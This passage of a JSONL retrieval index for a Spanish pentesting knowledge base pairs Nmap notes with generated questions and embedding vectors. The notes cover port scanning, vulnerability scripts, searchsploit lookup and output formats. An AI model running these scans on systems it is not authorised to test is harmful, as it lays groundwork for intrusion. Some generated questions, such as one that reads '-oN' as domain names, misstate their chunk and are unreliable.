-0.1103, -0.02786, -0.11811, -0.05721, 0.05143, -0.06371, 0.03749, -0.03075, 0.00911, 0.01375, -0.00224, -0.01676, -0.09646, -0.04509, -0.20233, -0.0078, -0.02056, -0.04807, -0.04914, -0.01322, 0.05947, 0.03192, 0.01273, 0.00928, 0.04193, 0.01226, -0.06227, -0.04371, -0.08108, -0.02881, 0.02423, -0.00519, -0.12102, 0.01627, -0.06392, 0.01556, -0.01528, 0.03189, 0.00981, 0.10306, 0.04376, -0.00712, 0.03244, 0.04357, -0.0237, 0.03498, -0.03177, 0.03299, 0.00527, 0.04613, -0.03394, 0.03831, 0.02505, -0.09297, -0.0689, -0.01309, -0.00633, 0.00864, 0.02984, -0.02396, -0.00575, -0.00462, -0.01926, -0.05756, -0.00022, 0.0052, 0.01436, 0.05839, -0.00757, -0.0014, 0.04198, 0.00498, -0.00462, 0.0047, 0.00245, -0.00212, -0.0084, -0.11416, 0.04323, 0.01477, -0.05693, -0.01696, -0.00024, -0.03676, -0.01267, -0.00847, -0.05064, 0.00928, 0.08997, 0.04613, 0.14218, -0.00403, 0.00679, -0.00684, -0.06325, 0.04221, -0.04236, 0.0185, 0.01531, 0.00363, 0.00498, 0.05432, -0.03235, 0.0472, -0.01481, -0.00988, -0.05884, 0.03501, 0.02521, -0.02608, 0.02321, -0.02559, 0.01863, 0.10453, -0.00211, -0.02554, -0.007, -0.00245, 0.01614, -0.00666, -0.01077, -0.04257, 0.02919, -0.00817, -0.00106, 0.02763, -0.01622, 0.00544, -0.00533, -0.04764, -0.00787, 0.01361, 0.01224, -0.00285, 0.06396, 0.05491]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Escaneo de puertos\n```bash\nsudo nmap -sS 192.168.X.0/24 -oG full.txt # SYN top-1000, greppable\nsudo nmap -p- -Pn --min-rate 5000 -n --open IP # TODOS los 65535, solo abiertos β†’ Puertos olvidados\nsudo nmap -sU --top-ports 50 -T4 IP # UDP (SNMP/TFTP/NTP)\nsudo nmap -sCV -p 22,80,445 IP # versiΓ³n + scripts default β†’ Nmap NSE\nsudo nmap -p80 --script vuln IP # NSE de vulnerabilidades\n```", "indexar": "What tool can I use to scan all 65535 ports on an IP address and only show the open ones?", "v": [-0.02686, -0.02107, -0.24375, -0.17774, -0.01149, -0.23283, -0.00952, -0.1073, -0.10484, 0.01225, -0.07828, -0.148, 0.00418, -0.06336, -0.06528, -0.00733, 0.07276, -0.01775, 0.07568, -0.08261, -0.11765, 0.14972, -0.17309, -0.08492, 0.0634, 0.11378, -0.11019, 0.05151, -0.1197, -0.03939, -0.08899, -0.09852, 0.0205, 0.02914, -0.14129, -0.13612, 0.08893, 0.07021, 0.09233, 0.1214, -0.00335, -0.00373, -0.0478, 0.04404, 0.12466, -0.00602, 0.02268, 0.01151, -0.03859, 0.00898, -0.13885, -0.23467, -0.01311, 0.04308, -0.11251, -0.03892, 0.02286, -0.01511, -0.02085, 6e-05, -0.01763, 0.05412, -0.1175, -0.0503, 0.00198, -0.07972, -0.07612, 0.07068, -0.12756, -0.01177, -0.07269, -0.02761, -0.04699, 0.14987, 0.04792, -0.06929, -0.0449, -0.03122, 0.09256, 0.05307, 0.08586, -0.02205, -0.06449, -0.07449, -0.12366, -0.00458, -0.04012, -0.08852, 0.02182, -0.09838, 0.01178, 0.02063, 0.03883, 0.11464, 0.07181, -0.01032, 0.002, 0.04837, -0.0789, -0.02355, 0.06466, 0.06596, -0.13068, 0.05124, 0.04731, 0.05381, 0.00411, -0.03762, -0.01299, 0.05293, -0.04316, 0.07996, 0.0194, -0.02978, -0.02109, -0.00465, -0.05973, -0.00926, -0.00614, -0.04031, 0.04881, -0.01963, 0.01584, 0.0051, 0.06142, -0.03166, 0.00718, 0.06234, 0.04096, 0.03889, 0.03066, -0.03004, -0.03997, -0.02668, 0.05926, -0.05657, -0.01288, -0.09694, 0.03981, 0.09504, 0.03931, 0.01972, 0.04527, 0.01116, 0.06373, -0.05139, -0.06086, -0.00421, -0.0674, -0.04319, 0.05187, -0.00552, -0.03895, 0.04106, -0.06634, -0.02447, 0.05521, -0.04102, -0.02628, 0.01842, -0.0512, -0.01084, 0.06243, 0.01245, -0.02333, 0.03567, -0.01887, 0.06482, 0.02038, -0.01284, 0.00725, 0.09883, -0.03226, -0.02411, 0.00406, 0.00656, -0.00913, 0.01676, 0.00699, -0.05456, 0.05875, 0.01144, 0.02639, 0.00304, 0.0354, 0.01086, 0.03238, -0.09742, 0.04687, 0.01693, 0.02579, 0.00555, -0.01584, 0.03107, 0.0308, 0.03728, -0.04964, -0.00105, 0.01904, -0.03214, -0.01514, -0.00106, 0.00014, -0.04131, 0.0618, 0.04027, -0.04647, -0.00047, -0.0383, 0.01838, -0.03609, -0.02306, 0.02642, -0.00011, -0.10341, 0.04746, -0.00842, 0.05758, 0.05702, -0.01236, -0.04243, 0.04235, -0.0308, 0.00602, 0.03431, 0.0221, -0.01531, -0.01026, 0.0476, -0.03457, 0.06042, 0.01169, -0.01416, -0.01042, 0.00282, -0.04629, 0.0132, 0.00595, 0.04154, -0.00517, -0.01926, 0.00968, 0.04797, -0.0027, 0.02396, 0.04367, -0.01759, 0.02093, -0.05678, -0.04825, -0.05953, -0.00884, 0.0218, -0.02154, -0.01494, -0.01183]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Escaneo de puertos\n```bash\nsudo nmap -sS 192.168.X.0/24 -oG full.txt # SYN top-1000, greppable\nsudo nmap -p- -Pn --min-rate 5000 -n --open IP # TODOS los 65535, solo abiertos β†’ Puertos olvidados\nsudo nmap -sU --top-ports 50 -T4 IP # UDP (SNMP/TFTP/NTP)\nsudo nmap -sCV -p 22,80,445 IP # versiΓ³n + scripts default β†’ Nmap NSE\nsudo nmap -p80 --script vuln IP # NSE de vulnerabilidades\n```", "indexar": "How do I check for UDP services like SNMP or TFTP using a scanning program?", "v": [-0.01321, -0.04317, -0.12633, -0.19834, 0.04515, -0.09461, -0.06079, -0.06595, -0.03797, 0.18987, -0.05487, 0.04815, 0.06732, -0.15426, -0.21486, 0.01248, -0.03158, -0.23573, 0.13886, 0.04748, -0.00503, 0.05373, -0.0647, -0.06068, 0.01793, 0.02393, -0.09331, -0.01747, -0.094, -0.04268, 0.10436, -0.01836, -0.07124, -0.10272, -0.1082, -0.06528, 0.05067, 0.05491, 0.09921, 0.09723, 0.02345, -0.01669, -0.02404, -0.00859, 0.07902, 0.06768, 0.00331, 0.01211, -0.02974, -0.00771, -0.10284, 0.04503, -0.06118, -0.00366, -0.14362, -0.00483, -0.00133, 0.04042, 0.01056, 0.00161, 0.01504, 0.07003, -0.06973, -0.08192, 0.01522, -0.07884, 0.01111, -0.0291, -0.07031, 0.01687, -0.1279, 0.01576, -0.00751, -0.03929, -0.05036, -0.00839, -0.06894, -0.0654, 0.16807, 0.01292, -0.00615, 0.02859, -0.13221, 0.05779, -0.10564, -0.03442, 0.04262, 0.05242, -0.06134, -0.02867, -0.10641, 0.00742, 0.03073, 0.13757, 0.07473, -0.05266, 0.05607, -0.00241, 0.05206, 0.11028, 0.04287, -0.02096, -0.11981, 0.0363, -0.06468, -0.01501, 0.11341, -0.0029, -0.01429, 0.01065, -0.07614, 0.03227, -0.09316, -0.11926, -0.05843, -0.0925, -0.02567, -0.04216, 0.05318, -0.08783, -0.02184, 0.009, -0.05931, -0.03473, 0.08318, -0.02677, 0.01599, 0.03259, -0.03327, 0.03323, 0.03305, 0.01256, -0.16534, -0.03533, -0.04264, -0.06996, -0.02655, -0.04214, 0.05041, 0.03186, -0.03345, 0.04565, 0.01872, -0.00841, 0.08523, -0.03397, 0.00879, -0.10708, 0.00391, 0.06402, 0.02382, -0.01356, -0.06398, -0.0172, -0.00183, -0.06318, 0.00911, -0.09274, -0.09166, 0.06688, -0.08075, -0.01657, 0.03438, -0.00125, 0.03064, 0.04245, -0.01252, 0.01112, 0.05416, -0.04289, -0.03351, 0.04424, -0.0277, -0.04578, -0.00819, -0.05465, 0.01176, -0.03968, 0.05326, -0.00668, -0.02347, 0.03413, 0.08363, 0.03044, 0.01768, -0.01182, 0.03031, -0.00608, 0.06621, -0.09675, 0.03018, 0.05231, 0.04546, 0.00375, 0.01545, -0.05066, 0.00188, 0.00107, 0.01791, -0.05028, -0.08594, -0.00132, 0.00797, -0.06587, -0.00353, 0.03904, 0.0012, 0.11311, -0.03514, 0.04843, 0.00289, -0.04783, 0.09001, -0.05631, -0.02444, -0.02843, -0.02406, 0.06112, 0.04556, 0.02182, -0.00757, -0.01307, 0.02502, -0.00769, -0.03325, -0.10656, 0.05173, 0.02066, 0.11029, 0.01111, 0.035, 0.0662, -0.00128, -0.06848, 0.05061, 0.04066, -0.00574, 0.06342, -0.01648, -0.0555, 0.01803, 0.00608, -0.01235, 0.00558, -0.00905, 0.00639, -0.08641, 0.03103, 0.02965, 0.02392, 0.01204, 0.00392, 0.03264, -0.01509, -0.0286, -0.01389]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Escaneo de puertos\n```bash\nsudo nmap -sS 192.168.X.0/24 -oG full.txt # SYN top-1000, greppable\nsudo nmap -p- -Pn --min-rate 5000 -n --open IP # TODOS los 65535, solo abiertos β†’ Puertos olvidados\nsudo nmap -sU --top-ports 50 -T4 IP # UDP (SNMP/TFTP/NTP)\nsudo nmap -sCV -p 22,80,445 IP # versiΓ³n + scripts default β†’ Nmap NSE\nsudo nmap -p80 --script vuln IP # NSE de vulnerabilidades\n```", "indexar": "What is a command-line scanner that can detect vulnerabilities and run specific scripts against default ports?", "v": [0.09256, -0.04702, -0.15266, -0.32267, -0.05483, -0.16256, -0.06656, -0.07868, 0.02935, 0.04486, -0.09461, -0.07341, -0.0849, -0.08653, 0.00684, 0.03864, -0.0216, -0.05384, 0.06022, -0.01529, -0.05117, -0.0541, 0.08417, -0.02762, 0.07134, 0.0535, -0.04495, 0.01063, -0.09118, -0.08867, -0.09796, 0.04706, 0.13264, 0.04023, -0.12975, 0.02624, -0.01856, 0.01002, 0.12285, 0.29599, 0.05026, 0.01983, -0.10099, 0.06361, 0.08101, -0.15111, 0.05142, 0.01053, 0.09311, -0.01462, -0.04794, -0.01118, -0.0766, 0.08167, -0.03084, 0.00373, 0.03194, -0.02176, 0.06363, -0.06502, -0.11077, -0.04992, -0.02437, -0.04072, 0.05324, -0.02947, -0.05956, -0.04173, -0.1403, -0.01456, -0.03227, 0.00062, -0.09563, 0.09291, 0.04734, -0.07355, -0.06602, -0.02843, 0.09996, 0.02257, -0.03408, 0.01334, -0.03489, 0.03215, -0.08685, -0.12784, -0.1608, 0.04989, 0.01058, -0.03682, 0.1124, 0.00888, -0.05209, 0.02979, 0.03309, -0.00724, 0.05033, -0.05275, -0.01789, 0.02074, -0.06605, -0.05747, -0.11934, 0.17399, 0.09083, -0.00365, -0.0289, -0.00916, 0.01749, 0.00214, 0.04737, -0.01209, -0.01093, 0.00975, -0.0023, -0.02919, 0.02873, 0.00709, -0.01904, 0.01769, -0.08197, -0.03323, -0.03615, -0.01914, 0.02574, -0.04905, 0.00519, 0.04677, 0.017, 0.03443, -0.04059, -0.01144, -0.09006, -0.06714, -0.11708, 0.15035, 0.0468, -0.09727, -0.07256, -0.00016, -0.00643, 0.06645, 0.01117, 0.15037, 0.03177, -0.03518, -0.04347, -0.02095, -0.07294, 0.00369, -0.00958, 0.02679, -0.05506, 0.00711, -0.03514, -0.06715, 0.01212, 0.01136, -0.07963, -0.01464, 0.04631, -0.01281, -0.04026, 0.03167, -0.02659, -0.00187, 0.00347, 0.01553, 0.03717, 0.00366, -0.02218, 0.09001, 0.02878, -0.03372, -0.02758, -0.02543, 0.03672, -0.0385, -0.00486, -0.05989, 0.0028, -0.00862, 0.05032, 0.00572, 0.06791, -0.01129, -0.0311, -0.05135, 0.05834, 0.0396, 0.01653, -0.00434, -0.04671, -0.00383, -0.00107, 0.00688, 0.01546, 0.01532, -0.00078, 0.01661, -0.04586, 0.08389, 0.02833, -0.03889, 0.09722, 0.06689, -0.06062, -0.03194, 0.02085, -0.03461, 0.02371, 0.00726, 0.02519, 0.00073, -0.07766, -0.02047, -0.0068, 0.06024, 0.00165, -0.07453, -0.03255, -0.04671, -0.02553, 0.00095, -0.00057, -0.01812, -0.00843, -0.01289, 0.06901, -0.03153, 0.08139, -0.01662, -0.05688, -0.01433, -0.02779, -0.01416, -0.02722, -0.00584, 0.02784, -0.04176, -0.01224, 0.01393, 0.04097, -0.07123, -0.00605, 0.00131, 0.01478, -0.02389, -0.0059, 0.04652, -0.03896, -0.00451, 0.03803, -0.02161, -0.01074, -0.02705]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El combo de dos pasos (patrΓ³n real)\n```bash\nnmap -p- -Pn --min-rate 5000 -n --open IP # 1) rΓ‘pido: ΒΏquΓ© puertos abren?\nnmap -sCV -p 22,80,445 IP # 2) dirigido: versiΓ³n+scripts sobre esos\n```\n`-sCV` = `-sC` (scripts default) + `-sV` (versiΓ³n). Luego `searchsploit` por versiΓ³n β†’ searchsploit.", "indexar": "quΓ© programa sirve para escanear puertos abiertos rΓ‘pidamente en una red?", "v": [0.07543, -0.04125, -0.1814, -0.08878, 0.07586, -0.13074, 0.09788, -0.19832, -0.02597, -0.09627, -0.14401, -0.03228, 0.03775, -0.14687, 0.0832, -0.0095, 0.00095, 0.04651, 0.14325, 0.10199, -0.05925, -0.01272, -0.06202, -0.06029, 0.05973, 0.08129, 0.02911, -0.00289, -0.08705, 0.07055, -0.01242, 0.1023, 0.0876, -0.02795, -0.01459, -0.05669, 0.12108, -0.02496, 0.0729, 0.04886, 0.03509, 0.01365, -0.07166, -0.07936, 0.11108, -0.06173, -0.00196, 0.02056, 0.02058, 0.0321, -0.03301, -0.03748, -0.05368, -0.02534, 0.00418, -0.01035, -0.06788, -0.00484, -0.0995, 0.00243, -0.00633, 0.04269, 0.05286, -0.08699, -0.0128, -0.09012, 0.0455, 0.10724, -0.05912, 0.02719, -0.10821, 0.02907, 0.0394, 0.08018, -0.05295, -0.05599, -0.0882, 0.00967, 0.03226, 0.07199, 0.06213, 0.03707, -0.01, 0.00459, 0.01995, -0.03337, -0.02729, -0.04935, -0.01022, -0.08731, 0.05451, 0.00076, 0.0576, 0.1659, 0.04969, -0.03354, 0.07667, 0.05701, -0.00404, 0.07012, 0.02302, -0.0213, -0.11841, 0.02977, -0.07266, 0.07976, 0.04224, -0.08221, 0.00284, 0.11797, 0.09228, -0.00358, 0.00688, -0.04777, -0.07442, -0.03496, -0.00468, -0.07002, -0.01314, 0.01458, -0.07745, -0.04921, -0.08257, 0.01055, 0.02062, -0.05298, 0.00261, 0.07152, 0.01615, 0.11187, -0.00523, -0.03843, -0.07044, -0.06452, -0.08241, -0.14958, 0.00866, -0.13141, 0.02421, -0.07506, -0.06445, 0.04767, -0.05888, -0.02674, -0.0152, 0.03449, 0.06525, -0.05888, -0.02237, -0.00628, 0.00051, 0.01349, -0.09273, 0.01701, -0.07976, 0.02734, 0.10873, -0.0003, -0.11228, 0.07462, -0.04108, -0.01047, -0.05324, -0.03187, 0.05142, -0.09523, -0.00657, 0.04374, 0.05816, 0.04688, 0.0175, 0.14891, -0.05415, -0.11482, 0.00632, -0.01134, -0.03271, -0.11419, -0.03948, -0.05963, -0.0562, 0.04915, 0.0109, -0.01065, -0.06985, -0.11706, -0.01938, -0.0748, -0.02337, 0.059, 0.00069, -0.03461, -0.00142, -0.03704, -0.02632, 0.04234, 0.00211, 0.01154, 0.00473, -0.05977, -0.00542, 0.01958, 0.03204, -0.02729, 0.03494, 0.08191, -0.04994, 0.03155, 0.04988, 0.16754, -0.04518, 0.00548, 0.06528, 0.04866, -0.02475, 0.00214, -0.01051, 0.09064, 0.09838, 0.04198, 0.00428, -0.01651, -0.0352, 0.08411, -0.00787, -0.01664, 0.03386, -0.01548, 0.02809, 0.04317, 0.04008, -0.08251, -0.06203, -0.01669, -0.02276, -0.03362, -0.00722, 0.03832, 0.01597, -0.04471, 0.00054, 0.02509, -0.02735, -0.05528, 0.06765, -0.02954, -0.02319, 0.01458, 0.03329, 0.00248, -0.10165, 0.08026, -0.03357, -0.06639, 0.03879, 0.01663]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El combo de dos pasos (patrΓ³n real)\n```bash\nnmap -p- -Pn --min-rate 5000 -n --open IP # 1) rΓ‘pido: ΒΏquΓ© puertos abren?\nnmap -sCV -p 22,80,445 IP # 2) dirigido: versiΓ³n+scripts sobre esos\n```\n`-sCV` = `-sC` (scripts default) + `-sV` (versiΓ³n). Luego `searchsploit` por versiΓ³n β†’ searchsploit.", "indexar": "con quΓ© puedo saber la versiΓ³n y los scripts de seguridad de un servicio especΓ­fico?", "v": [-0.03788, 0.09446, -0.11766, -0.14621, -0.06354, -0.24228, -0.13756, -0.15446, 0.09855, -0.0567, -0.09645, -0.09347, -0.02159, -0.13934, 0.04459, 0.00921, 0.04566, -0.0927, 0.02209, 0.07157, 0.09686, -0.12587, -0.0208, -0.00781, -0.11, 0.05248, 0.08068, 0.01944, -0.18079, -0.03212, -0.03293, 0.03879, 0.00327, -0.02757, -0.08295, 0.063, 0.02968, 0.06788, 0.01796, 0.12936, -0.01129, -0.10201, 0.01261, 0.06784, 0.12537, -0.0579, 0.04604, 0.02553, 0.07229, -0.0405, -0.00851, -0.05415, -0.09563, -0.06963, -0.096, 0.01334, 0.03092, -0.12326, -0.02268, 0.06574, -0.09556, -0.06302, -0.01433, 0.00971, 0.11938, -0.03468, 0.00407, -0.0672, -0.0556, -0.02282, -0.0505, 0.00695, 0.01574, 0.08523, -0.01763, -0.01046, -0.11167, -0.05462, -0.0438, 0.07061, -0.00449, 0.04893, -0.05912, 0.00182, -0.05564, -0.09922, -0.12902, -0.04614, -0.08923, -0.01343, 0.15273, 0.12988, -0.03909, 0.01769, -0.02808, -0.04364, 0.06259, -0.03219, -0.01168, -0.01016, 0.002, -0.07269, 0.00034, 0.16205, -0.01402, 0.00763, 0.07264, 0.02092, 0.01214, -0.05021, -0.0133, 0.0504, -0.01555, 0.03812, -0.00973, -0.02309, -0.00975, -0.00643, 0.10034, -0.01332, -0.09059, -0.0006, 0.01517, -0.03859, 0.09244, -0.05442, -0.04967, 0.07408, -0.02847, -0.04133, -0.09476, -0.04647, -0.13699, -0.07175, -0.04859, 0.12817, 0.06484, -0.02153, -0.05726, -0.02343, 0.07377, -0.01659, 0.07568, 0.08245, 0.07041, -0.0011, -0.01529, -0.08074, -0.01947, 0.01082, 0.00621, 0.01358, -0.01429, 0.02441, -0.01425, -0.03096, -0.01781, -0.05446, -0.01735, 0.07697, 0.01921, 0.01189, -0.03287, -0.01542, 0.02928, -0.00435, -0.03632, 0.01687, 0.04401, 0.04512, -0.03722, 0.0192, 0.09977, -0.08381, 0.00104, -0.04857, -0.10419, -0.0819, -0.06006, -0.04467, -0.00702, -0.04806, -0.00786, 0.01243, 0.0178, -0.11725, -0.00457, -0.01649, -0.03536, 0.01896, -0.00507, 0.05394, -0.05658, -0.04106, -0.0319, -0.02955, -0.00357, -0.03579, -0.05203, 0.01358, -0.10897, 0.05267, 0.03612, -0.04013, 0.07199, 0.03604, 0.0174, 0.04932, -0.00867, 0.00269, 0.03252, 0.02904, 0.04534, -0.01473, -0.00711, -0.01613, 0.07591, 0.04721, 0.00761, 0.00188, 0.03878, -0.03368, 0.0084, -0.0631, -0.02901, -0.05011, 0.07114, -0.01198, -0.00312, 0.06657, 0.02192, 0.0274, -0.10364, -0.02447, 0.04577, -0.037, -0.01998, -0.01578, -0.07433, -0.09581, -0.02294, 0.09567, -0.01514, -0.09284, -0.07443, -0.03663, -0.06796, 0.03129, -0.00914, -0.03195, 0.00095, 0.02834, 0.01906, -0.05943, 0.00091, -0.02311]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Salida\n- `-oN` normal (legible, los NSE salen aquΓ­) Β· `-oG` greppable (1 lΓ­nea/host, ideal `grep`) Β· `-oA` los 3.\n- Greppeo de resultados β†’ Bucles bash sobre IPs.", "indexar": "que programa muestra los Nombres de Sistema de Dominio legibles en lugar del formato greppable?", "v": [-0.15024, 0.01594, 0.04802, -0.22609, 0.05101, -0.02924, 0.02935, -0.05093, -0.06359, -0.03234, 0.08693, -0.1037, -0.09367, -0.24056, -0.02988, 0.00378, 0.10355, -0.07493, -0.10748, -0.00352, -0.03957, -0.05677, 0.05303, -0.13235, 0.06487, -0.1613, -0.00544, -0.07322, -0.09203, 0.08469, 0.028, -0.05201, 0.00765, -0.1992, 0.04331, -0.11587, -0.01509, -0.0595, -0.0014, 0.04378, 0.10923, -0.02926, -0.13416, 0.04634, 0.03575, -0.04441, -0.02856, 0.0164, -0.0224, -0.10181, -0.03115, 0.07369, -0.05653, -0.05052, -0.02912, -0.07884, 0.12012, -0.08482, -0.01324, 0.06946, 0.01681, -0.02335, 0.05796, -0.08562, 0.01729, 0.02502, -0.0213, 0.00066, -0.08408, -0.0341, 0.02265, -0.04541, 0.011, 0.02367, 0.01847, 0.03211, -0.02071, -0.05147, -0.01331, -0.12812, 0.04128, 0.00919, -0.05331, 0.07445, -0.03632, -0.04922, 0.06799, -0.08927, -0.07175, -0.04547, 0.15611, 0.00819, 0.1162, 0.08915, -0.01101, -0.07816, -0.01366, 0.11913, 0.00436, -0.03677, 0.10332, 0.09069, -0.12107, 0.02497, -0.03843, 0.05455, 0.07407, -0.01274, -0.0098, 0.05192, -0.01003, 0.02272, -0.08037, -0.0411, -0.08642, -0.01919, 0.06479, -0.01346, 0.00706, -0.06016, -0.02597, 0.02593, -0.08616, 0.00543, 0.1171, 0.00175, -0.05261, -0.01839, 0.02889, 0.03561, 0.03173, 0.04449, 0.02412, 0.01324, 0.06322, -0.08106, 0.05521, 0.03429, -0.00083, -0.03961, -0.02796, 0.07485, 0.01591, -0.00699, 0.03303, -0.08793, 0.08657, -0.04657, -0.00212, 0.07419, -0.06959, 0.10306, 0.04568, -0.01283, -0.01219, -0.00491, 0.03476, -0.01384, -0.05239, 0.02245, -0.07325, 0.017, -0.0023, 0.0039, 0.05575, 0.00188, 0.03211, -0.00449, 0.12243, 0.00674, 0.01592, 0.04366, -0.00996, 0.00398, 0.01057, -0.02559, -0.0514, -0.13258, 0.09683, -0.02409, -0.07855, 0.07234, 0.06354, 0.00859, -0.09016, 0.00419, -0.02312, -0.01603, 0.03708, 0.03031, 0.05451, 0.02626, -0.01356, 0.01846, -0.02773, -0.02441, -0.05594, -0.05052, 0.05124, 0.10508, -0.10009, 0.02283, -0.03194, -0.06713, 0.05441, 0.05357, 0.00319, 0.00631, 0.02255, 0.04691, -0.01241, -0.04056, -0.01371, -0.03248, -0.0437, -0.07028, 0.00796, 0.04919, 0.01518, -0.01473, 0.02275, 0.0441, 0.05272, 0.03885, -8e-05, -0.08136, 0.06301, 0.07859, 0.00351, 0.00717, -0.01742, -0.00517, -0.00494, -0.03108, -0.00305, 0.05195, 0.00434, 0.00455, -0.04525, -0.08447, 0.03315, 0.11617, -0.06424, -0.03939, -0.05461, -0.02452, -0.12499, 0.06143, 0.01244, -0.02703, 0.00064, 0.07759, 0.02061, -0.09384, 0.0061, -0.01291]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Salida\n- `-oN` normal (legible, los NSE salen aquΓ­) Β· `-oG` greppable (1 lΓ­nea/host, ideal `grep`) Β· `-oA` los 3.\n- Greppeo de resultados β†’ Bucles bash sobre IPs.", "indexar": "cual herramienta permite ver los NSE y ejecutar bucles bash sobre las direcciones IP encontradas?", "v": [0.07833, -0.02787, -0.21172, -0.07431, 0.07322, -0.18314, -0.01575, -0.13438, -0.08049, -0.02428, -0.0704, -0.03276, -0.12123, -0.0359, -0.03393, 0.09624, -0.08927, -0.08008, 0.01541, -0.12092, 0.01247, 0.02689, -0.14052, 0.09967, -0.13375, 0.05226, -0.09705, 0.08792, -0.11522, -0.10107, -0.13388, -0.11055, 0.05762, -0.01918, -0.05007, -0.14641, -0.04171, -0.03711, -0.08626, 0.07826, -0.05154, 0.04789, -0.14393, 0.09314, 0.08363, -0.07254, 0.0417, 0.00317, 0.09077, -0.07235, -0.07741, -0.08032, -0.18861, 0.0703, -0.02967, -0.06242, 0.14994, -0.02462, -0.0631, -0.04969, -0.12867, 0.00562, 0.03756, -0.12242, -0.01214, -0.054, 0.02328, -0.1422, -0.11279, -0.05178, 0.01927, 0.03159, -0.04477, 0.11265, 0.00073, -0.03402, -0.0101, 0.06132, 0.06674, 0.02758, 0.05247, 0.03516, -0.126, 0.0714, -0.08605, -0.01169, 0.05899, -0.16967, -0.00488, -0.05878, 0.0519, 0.06823, -0.03179, 0.05973, 0.02719, 0.01903, 0.06274, 0.04497, -0.03216, 0.00187, 0.11023, 0.01373, -0.12229, 0.08479, 0.02098, 0.07284, -0.00407, 0.06313, -0.02584, -0.00527, -0.00633, 0.0082, 0.05987, -0.05752, 0.02648, -0.00183, -0.0183, -0.03941, -0.00613, -0.07116, 0.03416, 0.03666, -0.0083, 0.00716, -0.012, 0.01857, -0.00271, 0.11477, -0.02655, -0.06389, 0.02273, -0.08219, -0.02339, -0.01901, 0.04291, 0.02571, -0.01456, -0.11188, -0.00644, -0.06647, 0.10837, -0.03956, -0.03361, -0.08961, 0.04194, -0.02574, 0.05079, -0.10183, -0.01319, 0.03382, 0.06164, -0.04294, -0.00557, 0.07132, -0.05653, 0.0038, -0.03486, -0.02551, -0.056, 0.03091, -0.00382, -0.0209, 0.01775, -0.01337, 0.04073, -0.00623, -0.04596, 0.04444, 0.03648, 0.06284, 0.02279, 0.00334, -0.05266, 0.0141, -0.01208, -0.10696, -0.03214, -0.03469, 0.07771, -0.02414, 0.0177, -0.02684, 0.02712, -0.04341, 0.03599, 0.00052, 0.03888, 0.00892, -0.05113, 0.09932, 0.02928, 0.02258, -0.02366, -0.07494, 0.02607, -0.05337, 0.00115, -0.09621, -0.03407, -0.03218, -0.04064, -0.00281, -0.02711, -0.01735, 0.00261, 0.01032, -0.06609, -0.02345, -0.06388, 0.01853, 0.00991, -0.00632, 0.01555, -0.06366, -0.07953, -0.04331, -0.00762, -0.03961, 0.01402, -0.02602, -0.03661, -0.00667, 0.0421, -0.04338, -0.0459, -0.00311, -0.00018, 0.01544, 0.00091, -0.0295, -0.01949, -0.02515, -0.02755, 0.01483, 0.035, -0.04401, -0.00121, -0.01979, -0.00842, -0.04708, 0.01453, 0.04733, 0.01458, -0.05345, -0.01136, -0.04689, -0.02275, 0.00142, -0.05511, -0.07152, -0.02425, 0.02123, 0.0641, -0.0573, -0.00469, -0.03343]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Salida\n- `-oN` normal (legible, los NSE salen aquΓ­) Β· `-oG` greppable (1 lΓ­nea/host, ideal `grep`) Β· `-oA` los 3.\n- Greppeo de resultados β†’ Bucles bash sobre IPs.", "indexar": "como puedo convertir la salida normal a formato greppable para usarlo en comandos de linea?", "v": [0.14207, 0.13318, -0.17188, -0.11143, -0.00069, -0.09397, -0.00589, 0.01357, -0.04627, -0.08296, -0.13285, -0.13177, -0.00019, 0.00992, -0.06321, 0.04556, 0.0431, 0.01484, -0.09012, -0.03425, 0.0427, -0.06763, -0.00136, -0.15949, 0.02398, 0.05244, 0.05742, -0.03891, -0.18215, -0.0489, -0.04282, 0.03634, 0.03077, -0.08252, -0.0697, -0.03522, -0.08648, 0.0443, -0.00144, 0.21651, 0.01216, 0.02518, -0.12516, -0.00417, 0.01649, -0.0862, 0.01557, 0.05452, -0.01814, -0.01665, -0.01178, -0.06857, -0.11893, -0.04654, -0.16565, -0.08364, 0.16562, -0.09576, -0.04405, 0.04606, -0.01353, -0.08888, 0.09253, 0.08844, -0.01624, -0.04739, -0.0598, -0.03402, -0.17671, -0.02166, -0.10085, 0.08261, -0.08122, 0.08821, 0.12274, 0.01945, -0.07775, -0.0372, 0.1569, -0.00623, 0.05941, 0.02555, -0.04454, -0.0425, -0.08568, -0.08047, -0.01373, -0.09281, -0.04389, -0.01932, 0.00831, -0.02436, 0.04658, -0.0499, -0.0349, -0.04571, -0.13113, 0.08881, 0.00892, -0.02246, 0.01394, 0.08521, -0.10884, 0.13209, -0.01209, -0.01984, 0.0606, -0.00901, -0.04095, 0.07788, -0.06439, 0.01454, -0.01423, -0.03184, -0.0676, 0.0409, 0.0132, -0.07944, -0.08989, -0.04455, -0.05289, -0.01417, 0.0394, 0.03161, 0.08081, -0.00816, -0.07901, -0.0015, 0.03485, 0.04128, -0.07441, 0.04664, 0.05546, -0.0511, -0.03675, 0.01112, 0.05466, 0.09209, -0.05157, -0.10949, 0.01607, 0.0683, -0.07621, 0.02128, 0.04581, -0.08165, 0.01681, 